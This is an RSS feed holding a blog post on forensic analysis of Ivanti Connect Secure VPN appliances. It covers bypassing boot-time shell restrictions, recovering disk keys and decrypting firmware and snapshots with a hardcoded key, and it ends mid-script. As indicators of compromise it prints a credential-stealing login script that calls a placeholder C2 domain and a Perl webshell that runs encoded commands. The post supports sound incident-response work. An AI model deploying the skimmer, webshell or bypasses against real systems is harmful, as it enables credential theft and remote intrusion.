<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Engineering Deficiency @ Meekolabs]]></title><description><![CDATA[Shitposts disguised as thinly-veiled attempts at security research on Windows Kernel Exploitation, Cloud Security, Machine Learning, and other random topics]]></description><link>https://research.meekolab.com</link><image><url>https://cdn.hashnode.com/res/hashnode/image/upload/v1715979130896/1VjiS-IsG.png</url><title>Engineering Deficiency @ Meekolabs</title><link>https://research.meekolab.com</link></image><generator>RSS for Node</generator><lastBuildDate>Sat, 18 Apr 2026 00:07:20 GMT</lastBuildDate><atom:link href="https://research.meekolab.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[Forensics on Network Appliances]]></title><description><![CDATA[This research was done using hardware obtained by myself individually, analyzed using hardware owned by myself individually. Information and opinions held in this presentation are my own and do not reflect my current or previous employers
Cover Illus...]]></description><link>https://research.meekolab.com/comprehensive-ivanti-connect-secure-forensics-guide</link><guid isPermaLink="true">https://research.meekolab.com/comprehensive-ivanti-connect-secure-forensics-guide</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Tue, 02 Sep 2025 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1756914311156/5c33310a-b1af-4df5-b15e-d1d0638028cf.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p>This research was done using hardware I obtained individually and analyzed using hardware I own individually. Information and opinions held in this presentation are my own and do not reflect those of my current or previous employers.</p>
<p><strong><em>Cover Illustration by onigiririice</em></strong></p>
</blockquote>
<p>The materials here were partly presented in my talk “Ghost in the Machine : The Mess of Doing Forensics in Network Appliances” at ITSEC Asia Summit 2025. This is a partial (but more focused and in-depth, I think) write-up for those who missed it.</p>
<h2 id="heading-intro">Intro</h2>
<p>Network appliance vulnerabilities are becoming an increasingly sticky target for threat groups (particularly APTs). Forescout reported that while endpoints were riskier than network devices in 2023, the end of that year saw a reversal driven by the number of exploited vulnerabilities in network devices, and that network equipment has since surpassed endpoints as the riskiest IT device category.</p>
<p>While security through obscurity is an <a target="_blank" href="https://utkusen.com/blog/security-by-obscurity-is-underrated">underappreciated strategy</a>, the level of blind trust we put in hardware vendors can sometimes be a bit excessive. Because of hardening requirements from standards such as FIPS 140-2, performing forensics yourself is nearly impossible with public documentation alone: vendors do not give shell access to the firmware, full-disk encryption further complicates things, and there is no built-in way to exfiltrate data even once a shell has been obtained. This makes accessing the firmware and exfiltrating it for analysis difficult, if not impossible, especially for organizations without a dedicated DFIR team with RE capabilities.</p>
<p>One of the most memorable cases of this for me is the <a target="_blank" href="https://forums.ivanti.com/s/article/KB-CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US">Ivanti Connect Secure</a> (formerly Pulse Secure, and before that a Juniper product), which was hit by four different CVEs in quick succession in early 2024 (CVE-2023-46805, CVE-2024-21887, CVE-2024-21893, and CVE-2024-22024). <a target="_blank" href="https://www.volexity.com/blog/2024/01/10/active-exploitation-of-two-zero-day-vulnerabilities-in-ivanti-connect-secure-vpn/">Volexity</a>, <a target="_blank" href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation">Mandiant</a>, and <a target="_blank" href="https://www.ivanti.com/blog/security-update-for-ivanti-connect-secure-and-ivanti-policy-secure-gateways">Ivanti</a> have all released IoCs and detection methods to detect a compromise. As with many vendors, though, a lot of these IoCs can only be checked either with the assistance of Ivanti themselves (who require you to send the system snapshot generated by the Integrity Checking Tool (ICT) so they can decrypt it) or by hiring an expert forensics team.</p>
<h2 id="heading-the-ivanti-connect-not-so-secure">The Ivanti Connect (not-so) Secure</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1756913650664/f3295e79-7254-498d-8a1d-17d4d4858291.png" alt class="image--center mx-auto" /></p>
<p>The initial RCE vulnerability on the Ivanti appliance started from something fairly benign: the initial VPN setup page. The Pulse Secure VPN has a page that is normally intended to be open to the public internet, where people can set up their two-factor authentication apps for the first time. This page has an API, and through two simple curl commands you can bypass the security checks and get RCE directly on the firmware. Why that function is even exposed via the API is beyond me, especially since the RCE itself relates to the licensing check.</p>
<p>There are two versions of Ivanti Connect Secure (or the Pulse Secure Appliance, the name used by the VPN before the acquisition):</p>
<ul>
<li><p>Hardware appliances in the form of the Pulse Secure Appliance (PSA) series, which was released around 2015 and mostly runs the LILO (Linux Loader) bootloader with a modified loop-AES disk encryption system</p>
</li>
<li><p>Hardened virtual appliances, which are distributed for deployment on virtualization systems like ESXi and mostly run the GRUB bootloader with LUKS encryption</p>
</li>
</ul>
<p>For the hardware appliance, there are lots of places that sell enterprise-grade hardware from years ago in bulk in almost every country if you look hard enough. For North American and European readers, a simple look at eBay or subreddits like <a target="_blank" href="https://www.reddit.com/r/homelabsales/">r/homelabsales</a> is a good start. For Indonesian readers, you can usually find some great stuff on sites like Bukalapak (which is honestly the only valid use for Bukalapak nowadays) or in places like electronics-focused malls.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1707410502693/90e8bb2a-1e74-407f-92cf-300d3940fc3f.jpeg" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-bootloaders">The Bootloaders</h2>
<p>While viewing the console on the virtualized appliance is trivial, reading the console on the hardware appliance requires the serial console. This is reached via the management port using an Ethernet to DB9 serial port to USB adapter, and the serial console can then be opened with something like PuTTY (Windows) or screen (Mac) on the USB COM port.</p>
<p>Upon booting it up, you'll be met with one of these two screens, the LILO bootloader and the GRUB Bootloader.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708068402912/be70d0d2-2000-45c9-ab19-1fb9e40d7fe7.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708019494599/4f386365-4819-4ce5-a61f-ee215ceca6cd.png" alt class="image--center mx-auto" /></p>
<p>While many are well accustomed to GRUB, you might be confused seeing LILO. LILO, or Linux Loader, is an older bootloader that predates GRUB and was deprecated in 2015. Compared to GRUB it has several deficiencies: it has no interactive command interface (it only supports boot arguments) and it does not support booting from a network. While restrictive, these limitations might be preferable for a vendor that wants to ship a locked-down Linux appliance without developing its own proprietary bootloader.</p>
<p>Both the LILO and GRUB versions offer two boot entries: the current kernel version and the rollback kernel version. The GRUB bootloader also has the option to perform a factory reset from the bootloader itself.</p>
<h2 id="heading-gaining-a-shell">Gaining a Shell</h2>
<p>When trying to set init to <code>/bin/sh</code> on either the GRUB-based or the LILO-based appliance, the argument is ignored. This is likely an attempt to comply with the FIPS 140-2 standard, which says that vendors should ensure that only authorized users can access cryptographic functions and keys. Pulse Secure seems to comply with this by locking down shell access to the firmware, because once we have a shell we can simply search for the disk keys and use them to cold-mount the disks.</p>
<pre><code class="lang-bash">__int64 __fastcall sub_FFFFFFFF826CC601(unsigned __int8 *a1)
{
  __int64 i;

  <span class="hljs-keyword">if</span> ( strcmp(a1, <span class="hljs-string">"/bin/sh"</span>) )
    qword_FFFFFFFF827E2030 = a1;
  <span class="hljs-keyword">for</span> ( i = 0LL; i != 31; ++i )
    qword_FFFFFFFF82212168[i] = 0LL;
  <span class="hljs-built_in">return</span> 1LL;
}
</code></pre>
<p>Watchtowr's analysis of the kernel found that Pulse Secure simply blacklists the exact string <code>/bin/sh</code>, which means we can use an equivalent spelling of the path instead: <code>init=//bin/sh</code>. The same check applies to the LILO bootloader, so it can be bypassed the same way by entering <code>current init=//bin/sh</code> to boot the <code>current</code> version of the firmware.</p>
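<p>To see why the doubled slash works, here is a minimal Python sketch of the comparison logic in the decompiled function above. The names <code>BLOCKED_INIT</code>, <code>DEFAULT_INIT</code>, and <code>select_init</code> are made up for illustration, and the default init path is an assumption rather than something read from the firmware.</p>
<pre><code class="lang-python"># Illustrative model of the kernel check, not code taken from the appliance.
BLOCKED_INIT = "/bin/sh"
DEFAULT_INIT = "/sbin/init"  # assumed placeholder for whatever init is normally used


def select_init(requested):
    """Return the init path that would be used for a given init= argument."""
    # Mirrors `if (strcmp(a1, "/bin/sh"))`: any argument that is not
    # byte-for-byte equal to the blocked string is accepted as the new init.
    if requested != BLOCKED_INIT:
        return requested
    return DEFAULT_INIT


for candidate in ("/bin/sh", "//bin/sh"):
    print(candidate, "gives", select_init(candidate))
</code></pre>
<p>Because the check is an exact string match rather than a check on the resolved path, a spelling that Linux resolves to the same file gets through untouched.</p>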
<h2 id="heading-decrypting-the-firmware">Decrypting the Firmware</h2>
<p>Gaining the shell is only half the battle. While many can do quick and dirty forensics using the provided shell, some may prefer to dump the firmware to another location so it can be analyzed with other tools, or simply viewed in a saner way than <code>cat</code>-ing the scripts inside.</p>
<p>PSA systems with LILO use a bespoke variant of loop-AES compiled into the kernel. This setup includes the <code>loop_setup_root</code> function, designed to handle the encrypted root device specified on the command line by wrapping it with a crypto loopback device using a hardcoded key. This operation occurs during the system's boot process, specifically within the <code>prepare_namespace</code> function, just before the root filesystem is mounted. GRUB-based appliances, according to Watchtowr, are instead encrypted with LUKS.</p>
<h3 id="heading-for-grub-based-appliances">For GRUB-based Appliances</h3>
<p>Upon gaining a shell, we can read the key, which is stored inside <code>/etc/lvmkey</code>:</p>
<pre><code class="lang-bash">sh-4.1<span class="hljs-comment"># cat -vE /etc/lvmkey</span>
$
M-9M-^^M-OM-^IuNM-G`^XM-J^NM-Z]jM-G
</code></pre>
<p>The key consists mostly of non-printable bytes, so <code>cat -vE</code> renders it in a special notation: <code>^</code> prefixes denote control characters, <code>M-</code> prefixes indicate bytes with the eighth bit set (values 128 to 255), and <code>$</code> marks the end of a line, i.e. a newline byte. Each character or symbol combination in the output maps back to one byte. For example, <code>M-9</code> is obtained by adding 128 to the ASCII value of <code>9</code> (<code>0x39</code>), resulting in <code>b9</code>. Control characters are interpreted by their control sequence, with <code>^X</code> representing the hexadecimal value <code>18</code>. Regular ASCII characters map directly to their hexadecimal values (e.g., <code>u</code> to <code>75</code>).</p>
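<p>Doing that mapping by hand gets tedious, so here is a small Python sketch that reverses the notation for the <code>cat -vE</code> output above. The helper name <code>decode_cat_v</code> is my own. Keep in mind the notation is inherently ambiguous (a literal <code>^</code> or <code>M-</code> in the data looks the same as an escape), so reading the file as raw bytes with something like <code>xxd</code> is safer when that option is available.</p>
<pre><code class="lang-python">import re

# One token per original byte: "M-^x", "M-x", "^x", or a single plain character.
TOKEN = re.compile(r"M-\^.|M-.|\^.|.", re.DOTALL)


def decode_cat_v(line):
    """Turn one line of `cat -v` notation back into raw bytes."""
    out = bytearray()
    for token in TOKEN.findall(line):
        high_bit = 0
        if len(token) in (3, 4):      # "M-x" or "M-^x": eighth bit was set
            high_bit = 0x80
            token = token[2:]
        if len(token) == 2:           # "^x": control character, x XOR 0x40
            value = ord(token[1]) ^ 0x40
        else:                         # ordinary printable ASCII character
            value = ord(token)
        out.append(value | high_bit)
    return bytes(out)


# With -E, the lone "$" on the first output line is an empty line: one newline byte.
key = b"\n" + decode_cat_v("M-9M-^^M-OM-^IuNM-G`^XM-J^NM-Z]jM-G")
print(key.hex())
</code></pre>
<p>For the output shown above this yields 16 bytes, starting with the newline (<code>0a</code>) followed by <code>b9</code>.</p>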
<p>After decoding it to hexadecimal we get the following key.</p>
<pre><code class="lang-c">\x0a\xb9\x9e\xcf\x89\x75\x4e\xc7\x60\x18\xca\x0e\xda\x5d\x6a\xc7
</code></pre>
<p>We can now use this to decrypt the LUKS volumes.</p>
<h3 id="heading-for-lilo-based-appliances">For LILO-based Appliances</h3>
<p>For LILO, the method is a little more complicated, as the disk is encrypted using a custom implementation of loop-AES. Stock loop-AES supports multiple AES-CBC modes that differ in how the per-sector Initialization Vectors are generated. It can also generate multiple keys from the same key material, selecting a specific key based on the sector number modulo the total number of keys.</p>
<p>However, Pulse Secure uses a simplified model: a single-key mode, with the key hardcoded directly into the kernel. I guess the rationale is that nobody with bad intentions will ever go into the appliance to tinker with it in this way.</p>
<p>Pulse Secure did modify loop-AES's CBC mode, though: the ciphertext is XORed with a decrypted version of the per-sector IV before decryption begins. So given:</p>
<ul>
<li><p><em>Dk()</em> as the AES decryption operation with key <em>K</em></p>
</li>
<li><p><em>IV</em> as the initialization vector for the block, which is the sector number encoded as a 16-byte little-endian integer for the first block and the ciphertext of the previous block for subsequent blocks</p>
</li>
<li><p><em>Ci</em> as the i-th ciphertext block</p>
</li>
</ul>
<p>The IV (the sector number for the first block, or the previous ciphertext block for subsequent blocks) is first decrypted using <em>Dk</em>, the AES decryption function with the key <em>K</em>, to produce <em>IV</em>′. The ciphertext block <em>Ci</em> is then XORed with <em>IV</em>′, reversing the final layer applied during the encryption process.</p>
<p>The result of that XOR operation, <em>X</em>, is decrypted using <em>Dk</em>, undoing the AES encryption applied to the plaintext during the initial encryption. The resulting intermediate plaintext <em>Pi</em>′ is XORed with the original (undecrypted) IV to completely reverse the xor-encrypt-xor process and recover the original plaintext block <em>Pi</em>. In code this looks like:</p>
<pre><code class="lang-python"><span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">xor</span>(<span class="hljs-params">s1, s2</span>):</span>
    <span class="hljs-keyword">return</span> bytes(c1 ^ c2 <span class="hljs-keyword">for</span> c1, c2 <span class="hljs-keyword">in</span> zip(s1, s2))

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ivanti_cbc_decrypt</span>(<span class="hljs-params">key, sector_number, encrypted_data</span>):</span>
    <span class="hljs-comment"># initialize AES cipher in ECB mode</span>
    cipher = AES.new(key=key, mode=AES.MODE_ECB)

    <span class="hljs-comment"># decrypt blocks of data</span>
    <span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decrypt_block</span>(<span class="hljs-params">iv, data_blocks</span>):</span>
        <span class="hljs-keyword">for</span> block <span class="hljs-keyword">in</span> data_blocks:
            pre_iv = cipher.decrypt(iv)
            xor_ciphertext = xor(block, pre_iv)
            plaintext_block = cipher.decrypt(xor_ciphertext)
            final_plaintext = xor(plaintext_block, iv)
            <span class="hljs-keyword">yield</span> final_plaintext
            iv = block
    iv = sector_number.to_bytes(length=<span class="hljs-number">16</span>, byteorder=<span class="hljs-string">'little'</span>)
    data_blocks = [encrypted_data[i:i+<span class="hljs-number">16</span>] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> range(<span class="hljs-number">0</span>, len(encrypted_data), <span class="hljs-number">16</span>)]
    decrypted_data = <span class="hljs-string">b''</span>.join(decrypt_block(iv, data_blocks))
    <span class="hljs-keyword">return</span> decrypted_data
</code></pre>
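<p>A quick way to convince yourself the chaining is right is a round trip. The sketch below is standard-library only, so it swaps AES for a deliberately trivial stand-in block cipher (<code>toy_encrypt</code> and <code>toy_decrypt</code>, which are NOT AES and not secure). The encryption direction in <code>chain_encrypt</code> is my own inference from the decryption steps above, not something confirmed against the kernel.</p>
<pre><code class="lang-python">def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def toy_encrypt(block, key):
    """Stand-in for AES encryption of one 16-byte block (NOT AES, NOT secure)."""
    mixed = xor(block, key)
    return mixed[1:] + mixed[:1]          # rotate left by one byte


def toy_decrypt(block, key):
    """Inverse of toy_encrypt."""
    rotated = block[-1:] + block[:-1]     # rotate right by one byte
    return xor(rotated, key)


def chain_encrypt(key, sector_number, plaintext):
    """Inferred inverse of the decryption chain: C = E(P xor IV) xor D(IV)."""
    iv = sector_number.to_bytes(16, "little")
    blocks = []
    for offset in range(0, len(plaintext), 16):
        block = plaintext[offset:offset + 16]
        cipher_block = xor(toy_encrypt(xor(block, iv), key), toy_decrypt(iv, key))
        blocks.append(cipher_block)
        iv = cipher_block                 # next IV is the previous ciphertext block
    return b"".join(blocks)


def chain_decrypt(key, sector_number, ciphertext):
    """Same steps as the script above: P = D(C xor D(IV)) xor IV."""
    iv = sector_number.to_bytes(16, "little")
    blocks = []
    for offset in range(0, len(ciphertext), 16):
        block = ciphertext[offset:offset + 16]
        plain_block = xor(toy_decrypt(xor(block, toy_decrypt(iv, key)), key), iv)
        blocks.append(plain_block)
        iv = block
    return b"".join(blocks)


key = bytes(range(16))
sample = b"0123456789abcdef" * 2          # two full 16-byte blocks
round_trip = chain_decrypt(key, 7, chain_encrypt(key, 7, sample))
print(round_trip == sample)
</code></pre>
<p>Swapping the toy functions for real AES-ECB block operations should give the same structure as <code>ivanti_cbc_decrypt</code>; the input length has to be a multiple of 16 bytes in either case.</p>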
<p>As every kernel version has a different key, you will need to extract the key from your own appliance's kernel, so I recommend trying this yourself on your own appliances.</p>
<h2 id="heading-forensics-object-of-focus">Forensics Object of Focus</h2>
<p>After leaving the appliance running as a honeypot for some time so that it gets indexed by sites like Censys and Shodan, there are three commonly targeted components that you need to check:</p>
<h3 id="heading-lastauthserverusedjs">lastauthserverused.js</h3>
<p>This component manages user preferences for the authentication and login process. Attackers modify the <code>Login(setCookies)</code> function to forward the login information of VPN users to a C2 domain of their choosing.</p>
<pre><code class="lang-javascript"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Login</span>(<span class="hljs-params">setCookies</span>) </span>{
<span class="hljs-comment">// NOTE START : THIS IS THE EXPLOIT</span>
    <span class="hljs-keyword">var</span> wdata = <span class="hljs-built_in">document</span>.frmLogin.username.value;
    <span class="hljs-keyword">var</span> sdata = <span class="hljs-built_in">document</span>.frmLogin.password.value;
    <span class="hljs-keyword">if</span> (wdata &amp;&amp; sdata) {
        <span class="hljs-keyword">var</span> wdata = btoa(wdata);
        <span class="hljs-keyword">var</span> sdata = btoa(sdata);
        <span class="hljs-keyword">const</span> url = <span class="hljs-string">'c2attackerdomain[.]com'</span> + wdata + <span class="hljs-string">'&amp;'</span> + sdata;
        <span class="hljs-keyword">var</span> xhr = <span class="hljs-keyword">new</span> XMLHttpRequest();
        xhr.open(<span class="hljs-string">'GET'</span>,url, <span class="hljs-literal">false</span>);
        xhr.send(<span class="hljs-literal">null</span>);
    }
<span class="hljs-comment">// NOTE END : THIS IS THE EXPLOIT</span>
    <span class="hljs-comment">// Remember currently selected auth realm</span>
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">typeof</span>(setCookies) == <span class="hljs-string">"number"</span> &amp;&amp; setCookies == <span class="hljs-number">0</span>) {
    }
    <span class="hljs-keyword">else</span> {
        LoginImpl();
    }
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">document</span>.frmLogin.tz_offset != <span class="hljs-literal">null</span>) {
      <span class="hljs-keyword">var</span> wdate = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span> (<span class="hljs-number">95</span>, <span class="hljs-number">12</span>, <span class="hljs-number">1</span>);
      <span class="hljs-keyword">var</span> sdate = <span class="hljs-keyword">new</span> <span class="hljs-built_in">Date</span> (<span class="hljs-number">95</span>, <span class="hljs-number">6</span>, <span class="hljs-number">1</span>);
      <span class="hljs-keyword">var</span> winter = (<span class="hljs-number">-1</span>) * wdate.getTimezoneOffset();
      <span class="hljs-keyword">var</span> summer = (<span class="hljs-number">-1</span>) * sdate.getTimezoneOffset();
      <span class="hljs-built_in">document</span>.frmLogin.tz_offset.value = winter &lt; summer ? winter : summer;
    }
    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
}

<span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">LoginPPC</span>(<span class="hljs-params">setCookies</span>) </span>{
    LoginImpl();
    <span class="hljs-keyword">if</span> (<span class="hljs-built_in">document</span>.frmLogin.username != <span class="hljs-literal">null</span>) {
        <span class="hljs-keyword">var</span> URL = GetCookieValue(<span class="hljs-string">'DSSignInURL'</span>);
        SetLastWsamInfo(<span class="hljs-built_in">document</span>.frmLogin.username.value, URL);
    }
    <span class="hljs-keyword">return</span> <span class="hljs-literal">true</span>;
}
</code></pre>
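<p>If you have dumped the firmware, a crude first pass over this file can be automated. The Python sketch below flags the constructs the injected block above relies on. The pattern list and the name <code>scan_login_js</code> are my own heuristics based only on the sample shown here, so a hit means "look closer", not "compromised", and a clean result proves nothing.</p>
<pre><code class="lang-python">import re

# Heuristics derived from the injected block above; labels are descriptive only.
SUSPICIOUS_PATTERNS = {
    "reads the password field": re.compile(r"frmLogin\.password\.value"),
    "base64-encodes a value": re.compile(r"\bbtoa\s*\("),
    "opens an XMLHttpRequest": re.compile(r"new\s+XMLHttpRequest\s*\("),
}


def scan_login_js(source):
    """Return the labels of every heuristic that matches the JavaScript source."""
    return [label for label, pattern in SUSPICIOUS_PATTERNS.items()
            if pattern.search(source)]


sample = (
    "var sdata = document.frmLogin.password.value;"
    "sdata = btoa(sdata);"
    "var xhr = new XMLHttpRequest();"
)
for finding in scan_login_js(sample):
    print("suspicious:", finding)
</code></pre>
<p>In practice you would read the real <code>lastauthserverused.js</code> from the dumped filesystem and pass its contents in as <code>source</code>.</p>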
<h3 id="heading-compcheckresultcgi-amp-dslogpm">compcheckresult.cgi &amp; DSLog.pm</h3>
<p><code>compcheckresult.cgi</code> is used by the appliance to determine the compatibility of client systems with specific components (e.g., SAM, NC, Host Checker, JNAM) based on the client's browser and platform (Windows, Mac, Linux). This script is executed when a user visits the appliance gateway interface, and it also calls another Perl module named <code>DSLog.pm</code>.</p>
<pre><code class="lang-perl"><span class="hljs-comment">#!/home/ecbuilds/int-rel/sa/9.1/bld24995.1/install/perl5/bin/perl -T</span>
<span class="hljs-comment"># -*- mode:perl; cperl-indent-level: 4; indent-tabs-mode:nil -*-</span>
<span class="hljs-comment">#</span>
<span class="hljs-comment">#  Copyright (c) 2005-2017 by Pulse Secure, LLC. All rights reserved</span>
<span class="hljs-comment">#</span>

<span class="hljs-keyword">use</span> lib ($ENV{<span class="hljs-string">'DSINSTALL'</span>} =~ <span class="hljs-regexp">/(\S*)/</span>)[<span class="hljs-number">0</span>] . <span class="hljs-string">"/perl"</span>;
<span class="hljs-keyword">use</span> lib ($ENV{<span class="hljs-string">'DSINSTALL'</span>} =~ <span class="hljs-regexp">/(\S*)/</span>)[<span class="hljs-number">0</span>] . <span class="hljs-string">"/perl/lib"</span>;

<span class="hljs-keyword">use</span> strict;
<span class="hljs-keyword">use</span> CGI <span class="hljs-string">qw(:standard)</span>;
<span class="hljs-keyword">use</span> DSSafe;
<span class="hljs-keyword">use</span> DSCBMeeting;
<span class="hljs-keyword">use</span> DSUI;
<span class="hljs-keyword">use</span> DSI18N;
<span class="hljs-keyword">use</span> DSHTMLUI;
<span class="hljs-keyword">use</span> DSSessionsManager;
<span class="hljs-keyword">use</span> DSLog;
</code></pre>
<p>The script that is then run contains the following webshell. It begins by capturing the browser's User-Agent string and the query string from the environment variables, then checks whether the user agent contains a specific hash value. If this condition is met and there is a second parameter in the query string, the script proceeds to parse this parameter.</p>
<pre><code class="lang-perl"><span class="hljs-keyword">my</span> $ua = $ENV<span class="hljs-string">{HTTP_USER_AGENT}</span>;
<span class="hljs-keyword">my</span> $req = $ENV<span class="hljs-string">{QUERY_STRING}</span>;
<span class="hljs-keyword">my</span> $qur = <span class="hljs-string">"0d570ddf3e373a06346cbb3f68942082d69e8af0022d152e87a41e9836e0bc7e"</span>;
<span class="hljs-keyword">my</span> @param = <span class="hljs-keyword">split</span>(<span class="hljs-regexp">/&amp;/</span>, $req);
<span class="hljs-keyword">if</span> (<span class="hljs-keyword">index</span>($ua, $qur) != -<span class="hljs-number">1</span>) {
    <span class="hljs-keyword">if</span> ($param[<span class="hljs-number">1</span>]){
        <span class="hljs-keyword">my</span> @res = <span class="hljs-keyword">split</span>(<span class="hljs-regexp">/=/</span>, $param[<span class="hljs-number">1</span>]);
        <span class="hljs-keyword">if</span> ($res[<span class="hljs-number">0</span>] eq (<span class="hljs-string">"cdi"</span>)){
           $res[<span class="hljs-number">1</span>] =~ <span class="hljs-regexp">s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg</span>;
           $res[<span class="hljs-number">1</span>] =~ <span class="hljs-regexp">tr/!-~/P-~!-O/</span>;
           <span class="hljs-keyword">system</span>(${res[<span class="hljs-number">1</span>]})
        }
    }
}
</code></pre>
<p>The parameter is expected to be a key and value pair separated by an equal sign. The script specifically looks for the parameter key "cdi". If found, it decodes the value associated with this key from its hexadecimal representation to ASCII, applies a Caesar-style shift to the decoded string (the <code>tr/!-~/P-~!-O/</code> mapping rotates the 94 printable ASCII characters by 47 positions, commonly known as ROT47), and then executes the resulting string as a system command.</p>
<p>There are many other IoCs from Mandiant, Volexity, and Watchtowr you should watch out for. This is not in any way an exhaustive list.</p>
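<p>When you find requests carrying a <code>cdi</code> value in web logs, it helps to recover what the attacker actually ran. The Python sketch below mirrors the two Perl transformations in the webshell above. The function name <code>decode_cdi_value</code> is my own, and it expects only the value part of the parameter, exactly as it appears in the query string.</p>
<pre><code class="lang-python">import re

# The 94 printable ASCII characters from '!' through '~'.
PRINTABLE = "".join(chr(code) for code in range(33, 127))
# Same mapping as Perl's tr/!-~/P-~!-O/ : rotate the printable range by 47.
ROT47 = str.maketrans(PRINTABLE, PRINTABLE[47:] + PRINTABLE[:47])


def decode_cdi_value(value):
    """Reverse the webshell's encoding: hex pairs to characters, then the tr mapping."""
    # Like the Perl s///eg, replace every pair of hex digits with its character.
    unhexed = re.sub(r"[0-9a-fA-F]{2}",
                     lambda match: chr(int(match.group(0), 16)),
                     value)
    return unhexed.translate(ROT47)


print(decode_cdi_value("3a35"))
</code></pre>
<p>Here <code>3a35</code> is a made-up example value, not one taken from a real incident: it unhexes to <code>:5</code>, which the rotation turns into <code>id</code>. Since a rotation by 47 over 94 characters is its own inverse, the same table also works for encoding test payloads.</p>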
<h2 id="heading-non-invasive-forensics">Non-Invasive Forensics</h2>
<p>Entering custom boot commands, dumping firmware via netcat, and decrypting LUKS drives using a Python script from a stranger on the internet might sound scary (and downright unacceptable in some mature enterprise settings).</p>
<p>For non-invasive, drive-by forensics, Ivanti recommends the <a target="_blank" href="https://forums.ivanti.com/s/article/KB44755?language=en_US">Integrity Checker Tool (ICT)</a>, which scans the System Snapshot Log for signs of compromise, new files, and mismatched hashes. But since Ivanti themselves recommend against trusting the internal ICT, we can instead pull the System Snapshot log from the appliance manually: open the panel at <code>/dana-admin/dump/dump.cgi</code>, select <code>Take Snapshot</code>, and then select <code>Download Admin Generated Snapshot</code> to download the log.</p>
<p>However, the snapshot itself is encrypted, and regular individuals cannot decrypt it without the help of Ivanti themselves, who have been inundated with decryption and support requests due to the zero-day fiasco.</p>
<p>Searching around the internet, I found this PoC screenshot by NCC Group for a different, <a target="_blank" href="https://research.nccgroup.com/2021/08/05/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-archive-extraction-cve-2021-22937-patch-bypass/">older zero day</a> affecting Pulse Secure, which shows the key for the encrypted appliance. It turns out this is the universal hardcoded 3DES key used to decrypt the ICT result.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1708083667304/1f870368-0033-4e95-9788-d163a3800489.png" alt class="image--center mx-auto" /></p>
<p>So we can create a simple Python script to decrypt the encrypted ICT file.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> sys
<span class="hljs-keyword">import</span> struct
<span class="hljs-keyword">import</span> argparse
<span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> DES3

<span class="hljs-comment"># Hardcoded DES3 key for decryption</span>
HARDCODED_KEY = bytes.fromhex(<span class="hljs-string">"7e95421a6b886641431b32c52442e2e483f81f58b0e9e9a5"</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">decrypt</span>(<span class="hljs-params">ciphertext, key, iv</span>):</span>
    <span class="hljs-string">"""Decrypts ciphertext using Triple DES (DES3) with CFB mode."""</span>
    cipher = DES3.new(key, DES3.MODE_CFB, iv, segment_size=<span class="hljs-number">64</span>)
    <span class="hljs-keyword">return</span> cipher.decrypt(ciphertext)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">parse_encrypted_config</span>(<span class="hljs-params">filename</span>):</span>
    <span class="hljs-string">"""Extracts the key, IV, and ciphertext from an encrypted snapshot file."""</span>
    <span class="hljs-keyword">with</span> open(filename, <span class="hljs-string">'rb'</span>) <span class="hljs-keyword">as</span> file:
        file.seek(<span class="hljs-number">1</span>)  <span class="hljs-comment"># Skip header or version byte</span>
        iv = file.read(<span class="hljs-number">8</span>)  <span class="hljs-comment"># Read 8-byte IV</span>
        file.seek(<span class="hljs-number">1</span>, <span class="hljs-number">1</span>)  <span class="hljs-comment"># Skip a byte indicating use of the hardcoded key</span>
        size = struct.unpack(<span class="hljs-string">'&lt;i'</span>, file.read(<span class="hljs-number">4</span>))[<span class="hljs-number">0</span>]  <span class="hljs-comment"># Get the size of encrypted data</span>
        ciphertext = file.read(size)  <span class="hljs-comment"># Read the ciphertext</span>
    <span class="hljs-keyword">return</span> HARDCODED_KEY, iv, ciphertext

<span class="hljs-keyword">if</span> __name__ == <span class="hljs-string">'__main__'</span>:
    parser = argparse.ArgumentParser(description=<span class="hljs-string">'Decrypt Ivanti Connect Secure ICT.'</span>)
    parser.add_argument(<span class="hljs-string">"action"</span>, help=<span class="hljs-string">"Specify the 'decryption' action"</span>, choices=(<span class="hljs-string">'decryption'</span>,))
    parser.add_argument(<span class="hljs-string">"input"</span>, help=<span class="hljs-string">"Path to the encrypted snapshot file"</span>)

    args = parser.parse_args()

    <span class="hljs-keyword">if</span> args.action == <span class="hljs-string">"decryption"</span>:
        key, iv, ciphertext = parse_encrypted_config(args.input)
        decrypted_data = decrypt(ciphertext, key, iv)
